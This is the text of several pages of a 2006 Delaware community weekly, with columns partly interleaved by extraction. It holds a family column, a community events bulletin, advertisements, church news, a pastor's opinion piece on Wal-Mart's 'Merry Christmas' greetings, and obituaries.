Wills, Trusts & Estates • Probate Avoidance • Elderlaw • Estate Administration • Medicaid/Nursing Homes • Corporations /LLCs • Business Purchases/Sales • Corporate/Business Formation • Real Estate Settlements • Guardianships Shannon R. Owens MORNING STAR ✳ NOVEMBER 23 - 29, 2006 PAGE 21 Memories during wartime of a long-ago childhood Summer evenings at my grandparents’ West Virginia home were YNN ARKS made for playing outside. Their front yard, an oasis of flat in a sea We went inside only of rolling hills, was perfect for freeze tag, hide and seek, Simon when darkness and says, red light green light — any playground game that three chiladvice from our dren, four years apart in age, grandmother about damp could come up with. Once in a while, we managed night air forced us to. to convince adult members of the family, who typically sat on the mail, was in italics and bold. front porch and talked, to join us in the “Then she went on to blame you” — cool grass. Our parents enjoyed the occabold — “for that ridiculous expression, sional round of badminton, my grandfathat you said it when you were kids. I ther, who even in his 70s could run the said it couldn’t be you — sounds more bases, often joined us for kickball. like Lynn” — again bold, followed by During one of those kickball games, I several explanation points. “What’s the misaimed my foot and kicked home truth here?” plate, a rock from the nearby field, inI was humbled by my brother-in-law’s stead of the ball. Despite my aching foot appreciation of my creative ability. But I and the fact that a kicked rock does not had to share the credit. travel nearly as far as a kicked ball, I “I don’t know who first said ‘Wobbly managed to make it to first base. Wilma,’” I wrote back. “But whoever it During another game, a small blood was, we all three endorsed it. And that vessel in our grandfather’s leg burst as he rounded third. He scored — Go team! only shows our wisdom — look at how the phrase has endured all these years. If — then limped to a chair under the Al Michaels himself used it, and John maple tree. Madden concurred, ‘Yes, that was indeed But troubles were rare. Most of the a Wobbly Wilma,’ I would not be at all evenings were wonderful, and we went surprised.” inside, and to the bathroom, where our Well, maybe I would be a little surmother helped us wash our grass-stained prised. But when dealing with brothersfeet, only when darkness and advice in-law, one must be firm. from our grandmother about damp night My brother’s account squared with air forced us to. mine. “I cannot remember who said it Much of our time outside was spent first, but there is a 33 and1/3-percent hitting a badminton shuttlecock. Not chance it was me,” he wrote. And, he over a net — the net wasn’t always set up — but one to the other in a circle, try- added, “I believe I have used that name in the last month.” ing to keep it in the air as long as we And this is the thing: We are not chilcould. For incentive, we got to sing one dren anymore. My brother, the youngest word of “Twinkle Twinkle Little Star” for every time our racquets hit the birdie. of the three of us, is a helicopter pilot, serving a one-year term (longer, if the We rarely made it past the first “star”; I powers-that-be feel like extending it) in don’t remember ever getting to the secIraq. ond and final “How I wonder what you Our days of play in cool West Virare.” We also had a Frisbee. Again standing ginia evenings are over. We all, and especially my brother, have far more seriin a circle, we threw it one to the other, trying, as with the shuttlecock, to keep it ous matters to worry about than catching Frisbees and hitting shuttlecocks. from hitting the ground. I hope that his ability to handle a sevWe didn’t sing in this game; instead, en-ton Blackhawk helicopter outweighs we invented silly names to describe our his skill, as I remember it, with a badthrows. The alliterative names were minton racquet. And I hope that when, in based on characters from The Flintthe last month, he was inspired to call stones: Fast Fred, Bad Barney, Bumsomething a Wobbly Wilma, it wasn’t Bum Bam-Bam; you get the idea. (Actually, I just made that last one up. If I had any kind of flying machine that he was talking about. thought of it 40 years ago, I would have Next Thanksgiving, my brother’s time ruled in the front yard Frisbee throwing in this foolish, ill-conceived and illcompetition.) planned war should be finished. He Most of the names were pretty munshould be back home and we all will be dane. But one, Wobbly Wilma, to deable to celebrate the holiday together. scribe a throw unlike anything the toy Perhaps, a celebratory game of “badmakers at Wham-O had in mind, we all use to this day. minton in the round” will be part of the “Hey Matt,” my brother-in-law wrote day. There are more people in our family in a recent e-mail to my brother (and now, including my athletic brother-incopied to other members of our family, law, and we should be able to get well including me). “I was watching the West beyond “Twinkle twinkle.” Virginia game the other night and the And if Frisbee throwing follows the Pitt quarterback threw a particularly bad badminton, I will be ready. Wobbly pass. My wife” —who is my sister and, obviously, my brother’s sister; back to Wilmas, Fast Freds, even Bum-Bum the story — “said, ‘Boy, that was a Wob- Bam-Bams — all will be welcome as we bly Wilma!” Wobbly Wilma, in his eall get to, once again, play like children. L P 628-9000 302 107 Pennsylvania Ave., Seaford, DE 19973 Two Convenient Locations 858-5009 302 503 W. Market St., Georgetown, DE 19947 Laurel mls 542710 $179,480 Michelle Mayer cell 302-249-7791 Village of Cinderberry mls 542468 $269,370 Deborah Johnson cell 302-245-3239 Seaford Golf & Country Club mls 540399 $419,000 Nancy Price Cell 302-236-3619 Coolbranch, Seaford mls539775 $46,000 Randy O’Neal cell 302-381-6395 Seaford mls540117 $185,000 Marty Loden cell 302-222-5058 Seaford mls542796 $129,900 Dan Bell cell 302-841-9750 Seaford mls541959 $209,000 Ed Higgins cell 302-841-0283 Seaford mls524907 $174,500 Brenda Rambo cell 302-236-2660 Laurel mls542632 $198,750 Dana Caplan cell 302-249-5169 Seaford mls542422 $389,000 Jessica Bradley cell 302-245-7927 • HONESTY • INTEGRITY • TRUST Wishing you a very happy Thanksgiving holiday. MORNING STAR ✳ NOVEMBER 23 - 29, 2006 PAGE 22 Community Bulletin Board EVENTS BINGOmember to join them for this interesting presentation. The date is Wednesday, Nov. 29. The program will start at 7 p.m. Light refreshments will be offered. Poker Night Novenber 25 The American Legion, Laurel Post 19, will hold Poker Night at the Post Home, 12168 Laurel Road, Laurel, DE 19956, on Saturday, Nov. 25, from 7 p.m. to 1 a.m. $3 per person entrance fee. Free Snacks. Come out and play a hand or two and a dozen more. Belly Dance Workshops SDPR is hosting 3 Belly Dance Workshops, Nov. 30, Dec. 7, and Dec. 14 at the Recreation Building, 7-8 p.m. Cost is $10. Attend one or all three.Classes will start in January. Call Athena at 381-6256 or the Recreation Office for more information. MEETINGS Toastmasters of Southern Delaware Visit the local chapter of Toastmasters International and improve your presentation and speaking skills. The next meeting is Nov. 30 in the educational wing of Bay Shore community church. For more information call Joy Slabaugh at 846-9201 or email joy@estfinancial.com. For more information about Toastmasters International, go to. Marine Corps League The Marine Corps League meets the first Thursday of each month, at 7:30 p.m., at the Log Cabin in Seaford. This month will be Dec. 7. Du Pont Golden Girls The annual Du Pont Golden Girls Luncheon will be Thursday, Dec. 7, at 11 a.m., at the Seaford Golf and Country Club. For reservations call Connie Keene 629-3377, or Jackie Davis 875-7625. How to submit items SHS Class of 1996 Stress Buster now through Dec. 22 Fitness Classes Monday, Wednesday, Friday, 9 a.m.; Tuesday and Thursdays, 5:30 p.m., now through Dec. 22 in St. John’s United Methodist Church Fellowship Hall in Seaford (Sponsored by St. John’s but open to the public). Sylvia will be providing for a.m. class only, excellent childcare at no extra fee. Beginners to intermediate participants welcome in this coed, non-competitive, muscle-toning, stretching, high/low aerobic class. Try a free one to see if it meets your needs. Only a 6-8 week commitment at a time required. For more information or to register call 21 year AFAA certified fitness professional, Carol Lynch, 629-7539. REUNIONS Basket BingoLongaberger Basket Bingo on Tuesday, Dec. 5, at Laurel Boys & Girls Club. Doors open at 6 p.m. Bingo begins at 7 p.m. Tickets are $20, $25 at the door. Several door prize drawings. Raffles: Hamper Basket, Hostess Holiday Bundle and more. Refreshments will be available. For more information call 875-1200 or 629-8740. Benefits the programming at the Laurel Boys & Girls Club. Your support is greatly appreciated. AARP Chapter 5340 Board AARP Chapter 5340 will hold a Board Meeting 10 a.m., Monday, Monday, ‘ole SHS. For additional information call Donna Hastings Angell 629-8077, or Mary Lee DeLuca at 6298429. Seaford Class of 1976 The Seaford Class of 1976 will hold its 30-year class reunion on Saturday, Nov. 25, at the Seaford Fire Hall from 6 p.m. until midnight. Light fare will be served, cash bar and music provided by Tranzfusion. For more information, contact David Smith at 410749-5776 or Dee (Christopher) Palmer at. 629-9410. You can also go to the class website at. HOLIDAYS Marine Corps League The Marine Corps League meets the first Thursday of each month, at 7:30 p.m., at the Log Cabin in Seaford. FOOD Breakfast Cafe VFW 4961 Breakfast Cafe, open Monday-Friday, 8-10 a.m., Seaford VFW, Middleford Road, to benefit Veterans Relief Fund. All are welcome. Sunday Breakfast Buffet Sunday breakfast buffet, All-You-CareTo Nov. 26. All-you-can-eat breakfast Blades Firemen and Ladies Auxiliary all-you-can-eat breakfast, Sunday, Dec.. DELMAR VFW POST 8276 Super Bingo Every Tuesday! CASH PAYOUT $100* Over 60 People $50* Under 60 People *Based on the number of people No one under the age of 18 allowed to play WINNER TAKE ALL Bonanza Game $1000.00 Jackpot! TIMES Doors Open 5:00 p.m. Games 6:45 p.m. TICKETS ON SALE Tuesday Night Delmar VFW Bingo 200 W. State St., Delmar, MD Information call: 410-896-3722 or 410-896-3379 Join Us For DINNERS 1st & 3rd Fridays, Starting at 6 p.m. MORNING STAR ✳ NOVEMBER 23 - 29, 2006 historic mansion. The charge is $10 per person and must be paid in advance. Reservations are required and may be made by calling Ruthe Wainwright at 629-8765. Seating is prearranged. Toys for Tots collections Nanticoke Auxiliary Winter Dance ‘Put. 15. You may also make a tax-deductible donation to marine Toys for Tots Foundation, PO Box 1947, Marine Corps Base, Quantico, VA 22134. Regional Builders appreciates your continued support for this very worthy cause. 6299596 or Sharyn Dukes at 236-7754. PAGE 23 875-3971 or 875-3733. dis- GOODFELLAS PIZZA & SUBS 1 Bi-State Blvd., Delmar, MD 410 DINE IN CARRY OUT DELIVERY 896-9606 Hand Tossed Pizza Baked In Brick Ovens Fresh Dough - Never Frozen FREE DELIVERY Present Ad Expires 12-31-06 Sundays and Mondays Ånyday 2 Large 1 Topping Pizzas $1.00 OFF $17. 99 + tax Any Size Pizza Present Star Coupon. Offer may not be combined with any other coupons or specials. Expires 12-31-06. Present Star Coupon. Offer may not be combined with any other coupons or specials. Expires 12-31-06. Dine-In Special Tuesdays Free Dessert Buy 1 Spaghetti & Meat Ball Dinner Get 1 FREE with Purchase of Meal & Drink Present Star Coupon. Offer may not be combined with any other coupons or specials. Expires 12-11-06. Offer may not be combined with any other coupons or specials. Thursdays Fridays Chicken n’ Dumplings Sub Special 2 Large Italian Subs $ 99 NLY + tax O Made the Italian Way with Guocchi’s 5 WITH GARLIC BREAD Offer may not be combined with any other coupons or specials. $ 900 + tax Offer may not be combined with any other coupons or specials. ENTER TO WIN STAR’S $500 GIVE-AWAY Dinner Special 50% off Dinner Friday • Saturday • Sunday Buy 1 Italian Dinner & 2 Beverages, Get 2nd Dinner 50% OFF (Equal or Lesser Value) Present Star Coupon. Offer may not be combined with any other coupons or specials. Expires 12-31-06. Wednesdays BBQ Ribs with Fries $ 99 7 + tax $ HALF RACK 1499 + tax Offer may not be combined with FULL RACK any other coupons or specials. Sun-Thurs 11 am-10 pm Fri & Sat 11 am-11 pm GROUPS & LARGE PARTIES WELCOME All Items Subject To MD Sales Tax Ad Specials Subject To Change Without Notice. WE DELIVER! 11am - 1pm & 5pm -Close $10.00 min. Purchase $1.00 Delivery Fee Purchase Limited Area PAGE 24 MORNING STAR ✳ NOVEMBER 23 - 29, 2006 SIX WEEKS Community Bulletin Board plays in the United States. Refreshments available. White elephant and consignment tables, train set raffle. FREE. 58 ISSUES ONLY 00 $ Players holiday production Possum Point Players’ holiday production, “The WPPP 1947 Christmas Special” will incorporate an old-style radio version of It’s A Wonderful Life mixed with seasonal solos, duets, and choral music at Possum Hall in Georgetown during the first two weekends of December. Performances are December 1, 2, 8 & 9 at 8 p.m., and December 3 & 10 at 2 p.m. in Georgetown. Tickets are $15, or $14 for seniors or students. For reservations, call the Possum Point Players ticketline at 856-4560. Bridgeville’s Caroling in the Park The Town of Bridgeville will host their annual Caroling in the Park on Friday, Dec. 1, at 6:30 p.m. The event will take place at the Historical Society Park on the corner of Delaware Avenue and William Street. Please bring a canned good donation for needy families. Come for fun, fellowship and a visit from Santa Claus. Bridgeville sponsors this event yearly on the first Friday evening in December. Christmas in Bridgeville Saturday, Dec. 2 - Christmas in Bridgeville Craft Show, Saturday, Dec. 2, 9 a.m.-3 p.m., at Woodbridge Jr./Sr. High School, Laws Street, Bridgeville. Admission is Free. There will be 60 vendors; $1 chances on an antique Oak Wash Stand. There will be catered breakfast and lunch available. Delmar Christmas Parade Saturday, Dec. 2 - Delmar’s annual Christmas parade. For details call the Delmar Chamber of Commerce, 846-3336. Rain Date: Sunday, Dec. 3, at 2 p.m. Applications can be picked-up at Delmar Town Hall. Georgetown holiday events Thursday, Dec. 7 - Georgetown Christmas parade. 7 p.m., starting at Sussex Central High School. For details call the chamber, 856-1544. Dec. 1, 2 and 3 - Annual Festival of Trees, Delaware Technical and Community College, Georgetown. Sponsored by Delaware Hospice Inc. For details call 856-7717. Dec. 1, 2, 3, 8, 9 and 10 - ‘The 1947 Christmas Special,’ a holiday music revue presented by the Possum Point Players, Georgetown, 8 p.m. Friday and Saturdays, and 2 p.m. Sundays. $15, $14 for senior citizens and students. For details, call 856-4560 or visit www. possumpointplayers.org. Monday, Dec. 4 - Caroling on the Circle, Georgetown. Beginning at 6:30 p.m., singers will lead members of the public in songs of the season. Canned goods will be collected. Laurel holiday events Friday, Dec. 8 - The Laurel Chamber of Commerce and Laurel Fire Department will again co-host the annual Christmas Parade. This year’s parade will take place on Dec. 8, at 7 p.m., with a rain date of Dec. 9. The theme this year is “Old Town Christmas.” Applications may be picked up at the Laurel Fire Department or the chamber office. Laurel Senior Center Christmas Show trip, Dutch Apple Theater, Lancaster, Pa., Dec. 20. Cost $63, includes transportation, luncheon and show. Shopping after the show if time permits. Call 875-2536 to reserve a seat with deposit. Art Show and Silent Auction The Children’s Beach House Art Show and Silent Auction committee is busy wrapping up details after almost one year of planning for their 17th annual Holiday Art Show and Auction on Dec. 1-3. All proceeds are divided among the programs offered by the Children’s Beach House whose mission is to help children with special needs reach their highest potential as functioning members of their families and communities. The event has reached 100% of its goal for artist participation. Nick Serratore of Lewes was named this year’s featured artist. Serratore will auction an original work based on his artistic interpretation of the event theme: “Home is where the heart is…Home is the Children’s Beach House.” A private reception for contributors and patrons is Fri., Dec. 1 from 6-10 p.m. The reception includes a pianist, caroling by Debbie Kee’s children’s choir, fine jewelry display by Elegant Slumming of Rehoboth, an artist meet and greet, and a sneak preview of the featured art and silent auction. The silent auction includes limo rides, child care, dining gift certifi- 17 * $ 00 SAVE 12 SUSSEX COUNTY OFF NEWSTAND PRICE DON’T MISS THIS SPECIAL SUBSCRIPTION OFFER Please start renew my subscription PLEASE CHECK ONE One Year Subscription $17.00 6 WEEKS FREE 58 Issues for ONLY $17.00* My check for $17 is enclosed. Please send Laurel Star Seaford Star to: Name _____________________________________________ Address: ___________________________________________ City _____________________ State _______ Zip __________ Phone __________________ Mail to: Morning Star, PO Box 1000, Seaford, DE 19973 Renewals: Please send this coupon with renewal notice. *Sussex County $17, Kent & New Castle Counties $22 Delmar & Federalsburg, MD $22, Out of State $27 Offer Expires Nov. 30, 2006 MORNING STAR ✳ NOVEMBER 23 - 29, 2006 carving, and more. Contest registration is held in September. The Egg Decorating contest is open to any Delaware resident interested in pursuing the art of egg decorating. The winning egg will receive $100 and an invitation from the White House to see the state eggs displayed with a welcome reception by the First Lady. For more information, contact Cindy Davis at the Delaware Department of Agriculture at 800-282-8685. cates, jewelry, art, home furnishings, golf packages, clothing, spa and salon services, lodging and more. The event continues with free admission on Sat., Dec. 2, 10 a.m. – 4 p.m. and Sun,, Dec. 3, noon – 3 p.m. For more information call 645-9184 or visit. Choral Society Christmas Concert Tickets are still available for the Southern Delaware Choral Society 22nd annual Christmas Concert, "Christmas Oratorio" by J.S. Bach, under the direction of John Ranney, on Saturday, Dec. 9, 2006 at 7:30 p.m. at St. Edmond's Church, Rehoboth Beach, and on Sunday, Dec. 10 at 3 p.m. at the Reformation Lutheran Church in Milford. Featured soloists will be soprano, Virginia Van Tine; alto, Rebecca McDaniel; tenor, Donald McCabe; baritone, Richard A.D. Freeman and bass, John R. Ranney. All are members of SDCS. Also joining the chorus will be trumpeter, Sarah Kuwick. Organist Crystal Pepper of Harrington is a guest soloist. In her 25 years as a church musician, Ms. Pepper has enjoyed a distinguished career as an organist and is well-known in a number of musical circles. She began accompanying church choirs at the age of 12 and by the time she was 15 she had become a regular organist and plays at various churches in the MidAtlantic region. She has a BA in vocal music from Delaware State University and has studied with John Dressler. She serves as director of music at the Dover Presbyterian Church and is currently pursuing a Master of Special Education at Wilmington College. Tickets to the Christmas concert are $15 and $10 for students. For tickets or more information call 302-645-2013 or log on to. SDCS is supported in part by grants from the National Endowment for the Arts and the Delaware Division of the Arts, a state agency committed to promoting and supporting the arts in Delaware. PAGE 25 Salisbury holiday events Saturday, Nov. 18, Sunday, Nov. 19 Maji Choral Festival at 7 p.m. on Saturday and at 2 p.m. on Sunday at Wicomico Senior High School, Salisbury. Tickets are $15. Call Bonnie Luna at 410-749-1633 for details.. Eggs will be on display Vote for the egg that you would like to represent the state of Delaware at the White House next year on Dec. 3 at the Dover Mall from noon – 5 p.m. Delaware egg artists of all ages will have their decorated eggs on display behind Santa, next to JC Penney. There will be more than 40 eggs to choose from. Since 1994, each state sends a decorated egg to the White House for display. Local crafters and artists create decorated eggs which represent each state and the District of Columbia. Eggs can be decorated in any fashion using paints, beads, decoupage, etching, Saturday, Nov. 25 - Starry Night Boat Parade along the Wicomico River in Salisbury. Sponsored by the Wicomico Yacht Club and Urban Salisbury. Call 410-5463205. Sunday, Dec. 3 - The 60th Annual Christmas Parade at 2 p.m. starting at the intersection of Mt. Hermon Road & Civic Avenue, traveling to East Main Street, ending at Ward Street. Sponsored by the Salisbury Junior Chamber of Commerce. Rain Date: Dec. 10, 2 p.m. Selbyville holiday events Friday, Dec. 1 - Selbyville Christmas Parade. The annual parade, sponsored by the Selbyville Chamber of Commerce, starts at 7 p.m. at the town hall, 68 Church St. For details call Bethany-Fenwick Area Chamber of Commerce, 539-2100, or visit www. bethany-fenwick.org. Snow Hill holiday events Christmas in Snow Hill, Friday through Monday, Dec. 1-4. Christmas tree lighting and kids coloring contest on Friday. Historic home and business tours on Saturday, along with Breakfast with Santa, Santa’s Workshop and a Christmas tree auction. Holiday music celebration and 19th Century Christmas at Furnace Town on Sunday. Snow Hill Christmas Parade on Monday, Dec. 4. Call 410-632-2080 for details. ETC. Babies & Toddlers. Read Aloud training Read Aloud Delaware volunteer training session will be held Tuesday, Nov. 28, at 1 p.m. in the Seaford Public Library, 402 North Porter St., Seaford. Call 8562527 to sign up for training or for further information. Volunteer readers are needed at various reading sites in Sussex County. Your Holiday Toy & Gift Headquarters W. C. Littleton & Son, Inc. 100 W. 10th St., Laurel, Del. • 875-7445 • 800-842-7445 IS YOUR GIFT STORE! A letter from Santa Mrs. Claus and I invite you and your families to join us at Delaware Hospice’s Festival of Trees for our Lunch with Santa, on Dec. 2, from 11 a.m. to 12:30 p.m., at Delaware Technical and Community College in Georgetown. Some close friends of ours from the North Pole will be joining us, and we’ll have pizza, goodie bags, and “special treats,” plus a picture with Mrs. Claus and I. You’ll also love our magnificently decorated trees and wreaths which will be on display. We hope to see you there! Sincerely, Santa Claus P.S. Admission tickets are $5 each, including admission to the tree and wreath exhibit. Purchase tickets in advance by calling Delaware Hospice, 856-7717 or Debbie Wright, 856-3878. All proceeds will benefit Delaware Hospice’s families. HATS STOCKING STUFFERS GALORE! OUR TREE IS LOADED WITH GIFTS FOR EVERYONE! STOP IN FOR BEST SELECTION! Christmas Sale up to 50% selected Items CHRISTMAS HOURS : Mon.-Fri. 8-5; Sat. 8-3 PM Saturday Dec. 23 8-5 PM Gift CA ava RDS ilab le! Visa, MasterCard, Discover Accepted GIFT CARDS AVAILABLE Scooters - Go Carts - 4 Wheelers - Hats - Toys - Hess Trucks - Pedal Toys So Much More... Layaway now ... Shop our wide selection! MORNING STAR ✳ NOVEMBER 23 - 29, 2006 PAGE 26 CHURCH BULLETINS Evening of gospel music Festivities planned on MLK Day St. Paul’s United Methodist Church, on Old Stage Rd. in Laurel, will present an evening of gospel music featuring the “Don Murray Family Band” on Nov. 26 at 7 p.m. A special guest performance begins the evening at 6:30 p.m. This band has spread the gospel through music for many years and is formerly known as “The Old Time Religion.” Songs are traditional and an enjoyable evening will be shared by all. For more information, call Pastor Don at 302-856-6107. For directions, call 302875-7900. Blaine Bowman at Christ Church Blaine Bowman and His Good Time Band are coming to Christ Evangelistic Church, 9802 Camp Road, Laurel, on Thursday, Dec. 7, at 7 p.m. A love offering will be taken. Thanksgiving dinners delivered Volunteers have been busy in the kitchen of St. Luke’s Episcopal Church parish hall. Thanksgiving dinners are being prepared for distribution to those in need in Seaford and the surrounding communities. The project is sponsored by the Church of God and Saints of Christ church members, who are using St. Luke’s facilities. The dinners will be delivered in Seaford, Laurel, Bridgeville and Georgetown by the YACTA youth group. This is a group of young people who organize food drives, and work within the church to serve Christ. YACTA stands for Youth Anointed with Confidence, Talent, and Old Time Religion will perform at St. Paul’s United Methodist Church. Atonement. Last year 1,600 dinners were prepared and distributed, some of which were served in the St. Luke’s Parish Hall to those in need on a walk-in basis. It is hoped that this year’s project will serve as least as many and perhaps more. Galestown UMC Fall Hymn Sing Galestown United Methodist Church will hold its annual Fall Hymn Sing on Dec. 3, at 2 p.m. Special music by “Revived” and “The Gospel Gents. A buffet style hot dinner will be served immediately following the service at the Galestown Community Center. The book titled “History Repeats Itself around Galestown Millpond” is now available for $5. This would make a great Christmas stocking stuffer gift for a special person as well as a great table top informative book. Guest preacher at Christ Church Come and hear dynamic preaching at Christ Evangelistic Church, 802 Camp Road, Laurel. Evangelist David Ellis will be preaching on Dec. 10, at the 11 a.m. service. Children’s Christmas Musical The children of Laurel Wesleyan Church will be performing a heavenly Christmas musical, “Fear Not Factor,” on A prayer breakfast, “Dare to Dream like the King,” is planned for Jan. 15, 2007 at 8 a.m. at the Seaford Country Club. The breakfast, which is a buffet, features keynote speaker, Dara Laws, the 2007 Seaford School District Teacher of the Year. Entertainment will be provided by The Good News Tour. Drs. Julius and NaTasha Mullen will receive the Community Recognition Award. Admission is $20 by advance tickets only. In conjunction with the prayer breakfast, the Western Sussex Boys & Girls Club will hold a day of activities for young adults from 11 a.m. to 5 p.m. Admission is $1 and features 7 Quilts for 7 Sisters as well as crafts, storytellers and entertainment. The day includes a teen summit and youth dance. Lunch is provided and vendors and giveaways are also included. For tickets and more information, call 302628-1908. Saturday, Dec. 2, at 6 p.m. and Sunday, Dec. 3 at 9 and 11 a.m., at Laurel Wesleyan church, located 1/2 mile north of Laurel on Rt. 13A. Nursery will be provided. For more information call 875-5380. Celebrate the Joy of Christmas The Delmar Church of God of Prophecy is excited to present the Broadway-style musical production “Let There Be Light.” Continued on page 27johns@dmv.com NOVEMBER 23 - 29, 2006 PAGE 27 FIRST BAPTIST CHURCH Merry Christmas to friends at Wal-Mart By the Rev. Todd K. Crofford Laurel Wesleyan Church PASTOR’S PERSPECTIVE It seems “Merry Christmas” is Most Americans you back in vogue. Wal-Mart announced this week that they will be meet have no problem including Merry Christmas in its seeing a Menorah on greetings, advertising, and holiday displays. one corner and a NaCertainly economics were a key tivity on the next. factor in this decision. Other retail stores including Macy’s and Kohl’s are following suit and believe this tion that embraces religious freedom is not will play well amongst American shopto sanitize us from religious expression, pers. but to be able to accept our differences Meanwhile, let me give three reasons why I believe ultimately this is a good de- without offense. Most Americans you cision, and one much more important than meet have no problem seeing a Menorah on one corner and a Nativity on the next. the bottom line benefit to stores. Finally, it is good to see a positive reFirst, it shows retailers still listen. sponse to Christians today. Recent years Wal-Mart was inundated by concerned have seen a parade of lawsuits trying to Americans who are tired of the liberals’ “protect” Americans against those dangerwar on Christmas. ous manger scenes in public, those acriIn letters, e-mails, personal complaints monious Christmas carols in school “holiand even outright boycotts customers told day” concerts, or any other mention of the Wal-Mart their politically correct decision name Christ during this season. was a poor one. Yet the celebration of Christmas preIt is gratifying to recognize that the dated the arrival of the pilgrims on the largest retailer in the world still gives Mayflower, is part of our historic tradition some credence to the opinions of their as a nation, and forms a part of who we clientele. Congratulations to those who are as a Christian nation. I hope that Waltook the time to graciously complain... Mart’s action will be a step in the direcyour voice was heard. tion of tolerance and reason that will serve Second, it represents a good viewpoint us all well this Christmas season. on freedom of speech. As Americans, we So, from my heart let me say, “Thanks need to realize that saying “Merry Christfor the Christmas gift, Wal-Mart.” Oh, and mas” is not a tacit form of saying, “Don’t “Merry Christmas to you too!” have a Happy Hanukah.” Celebrating a holiday of our own choosing is not a form The Rev. Crofford is Senior Pastor at Laurel Wesleyan Church. His views do not necessarily represent the views of of disrespecting other beliefs. the congregation or Wesleyan Church International. You The key to living side by side in a namay email pastortodd@laurelwesleyan.org CHURCH BULLETINS”) ome! Revelatio e To C n 22 Tim : 17 The Ark s ' t I Seaford Wesleyan Church River of Life Christian Center parsonage 875-2996 St. Luke’s Episcopal Church The Rev’d. Jeanne W. Kirby, Rector Continued from page 26 Directed and produced by three-time National Crystal Communicator Award winner, Wendy Craig, the production will premier Dec. 15, 16 and 17, at 7:30 p.m. with free admission. This is no ordinary “church skit.” With full set design, lighting, make up, costumes, singing and choreography it has already proved to be a delightful smash to both young and old alike. With a contemporary approach to the Christmas message, this group reminds us to “celebrate the joy of Christmas” - the joy of family and friends brought together again because of the baby Jesus. “Let There Be Light” is a major must-see event. The host pastor of the church is Bishop Michael Phillips. The church is located on Rt. 13 and Dorothy Road, just three miles north of the Maryland/Delaware state line. Refreshments will be served following the performance. A bicycle will be given away each night. Doors will open at 6:30 p.m. Come early because seats are limited. For more information, call 875-7824 o 875-3242. The Ninety & Nine Dinner The Ninety & Nine extends an invitation to both men and women to attend their annual Christmas dinner at The Seaford Golf & Country Club in Seaford, on Monday, Dec. 4, Guests Special speaker for the evening is Pastor Tim Dukes. When he was only eight years old, his family became a part of Epworth Fellowship Church in Laurel. In 1982, Tim graduated from Epworth Christian School. He attended Valley Forge Christian College and gradated in 1986. For more than five years he served as Youth Pastor in Farmville, Va. From Virginia he moved to Maryland and pioneered the Ocean City Worship Center and Continued on page 29 Sunday School - all ages 9:30 a.m. Worship 10:30 a.m. & 6:30 NOVEMBER 23 - 29, 2006 PAGE 28 OBITUARIES Jo Ann Sullivan, 64 Jo Ann Sullivan of Federalsburg, Md., died Tuesday, Nov. 14, 2006, at her home. She was born Oct. 16, 1942 in Federalsburg, the daughter of Rachel Bryant Richardson of Seaford, and the late Andrew A. Richardson, Sr. Jo Ann Sullivan She was a graduate of Federalsburg High School Class of 1960. In addition to being a wife and mother she had worked for the Seaford Banner, the Seaford and Laurel Star newspapers and the Seaford Leader in sales and marketing. She was instrumental in the startup of the Banner and the Stars. She attended Gloryland Tabernacle in Denton, Md. Besides her mother, she is survived by her husband of 45 years, James R. Sullivan, whom she married on Sept. 23, 1961, four children, Denise Stover and her husband, Mark, of Easton, Cindy Foskey and her husband, Mark, of Federalsburg, Cathy Todd and her husband, Larry, of Fenton, Mo., and Michael Sullivan and his wife, Kim, of Federalsburg; six grandchildren, Michael Cluley, Jr., Storm Sullivan, Candace Todd, Josh Todd, Amber Sullivan, and Kyle Sullivan; two brothers, Andrew Richardson and his wife, Sherry, of Federalsburg, and Bryant Richardson and his wife, Carol, of Seaford and several nieces and nephews. A memorial service was held on Saturday, Nov. 18, at the Framptom Funeral Home, P.A. in Federalsburg with the Rev. Otis Seese officiating. Memorial contributions may be made in her memory to Caroline Hospice Foundation, Inc., P.O. Box 362, Denton, MD 21629. Preston Hastings, 63 Preston “Cobby” Hastings of Laurel died Nov. 11, 2006. He was born a son of Alton and Alda Ferrell Hastings. Mr. Hastings worked 30 years, for Dukes Lumber Company. He was a member of the Seaford Moose Lodge. He volunteered his time to serve people in need. Obituaries are run without charge thanks to the support of area churches. He was an avid Dale Earnhart Sr. #3 fan. He loved working on cars. He enjoyed going to Ocean City, Md. for his wedding anniversary. He was a fantastic grandfather who loved every one of his children and grandchildren. He was predeceased by his parents and a brother Alfred “Punkin” Hastings, who died in 1995. He is survived by his wife of 13 years, Delores Hasting; a son, Preston Hastings Jr. and his wife Sheryl, of Laurel; daughters, Teresa Foskey of Laurel, stepdaughter Jeanette Massey of Blades; stepdaughter, Benda Robertson and husband Shannon of Selbyville; a brother, Harvey T. Hastings and wife Edna of Blades; sisters, Joyce Chambers and companion Henry Mason of Seaford; Peggy Dean and husband Bill of Laurel. He is also survived by 11 grandchildren: Eric, Chelsea, Tryston, Kerlee, Mason, Stephanni, Kortni, Benjamin, Zachary, Allen, Lori.; two great grandchildren, Kyler and Brianna.; and several nieces and nephews. His services were on Friday, Nov. 17, at Watson Funeral Home, Millsboro, with Pastor Jerry Denton, Pastor Timmy Dukes and Pastor Joe LeCates officiating. Interment was in Blades Cemetery, Blades. Contributions may be made to Blades Fire Dept., .200 East Fifth St., Blades, DE 19973 Letters of condolence may be emailed to: Watson Funeral Home, Delmarvaobits.com, or Watsonfh.com Gertrude A. Miller; and several nieces and a nephew. She is survived by a son, John L. Rouse and his wife, Patti, of Crisfield, Md.; two daughters, Sandy Bilbrough and her husband, Gary, of Secretary, Md., and Mary E. Sellers and her husband, David, of Denton, Md.; three grandchildren, Amy Wilson, Courtney Rouse, John Rouse, Jr.; three great-grandchildren, Michael, Dustin, and Amber. Her funeral service was on Nov. 22, at Framptom Funeral Home, P.A. in Federalsburg, with the Rev. Ray Parsons officiating. Interment followed at Maryland Eastern Shore Veterans Cemetery in Hurlock, Md. Memorial contributions may be made to Caroline County Hospice Foundation, P.O. Box 362, Denton, MD 21629. Harrison Bernard Connolley, 84 Harrison Bernard ‘Hots’ Connolley age 84, of Seaford, DE died Saturday, November 18, 2006 at Nanticoke Memorial Hospital. Born in Ridgely, MD on June 21, 1922, the son of Verona Hardesty and Carroll Connolley. He was a supervisor at the Chrysler Plant in Newark, retiring in 1982 after 30 years of service. He then worked as a guard at Beebe Hospital in Lewes, DE. He was a member of Our Lady of Lourdes Roman Catholic Church, Henlopen Grange # 20, an auxiliary member of Little People of America, Ches-Del Bays Chapter; in which he was instrumental in helping to form. He was a foster parent to 21 children and he had a great love for camping, fishing and crabbing. Union Eleanor M. Rouse, 77 United Methodist Church Eleanor M. Rouse, of Federalsburg known fondly as “Elea” departed this life on Nov. 17, 2006, at her residence. She was born Oct. 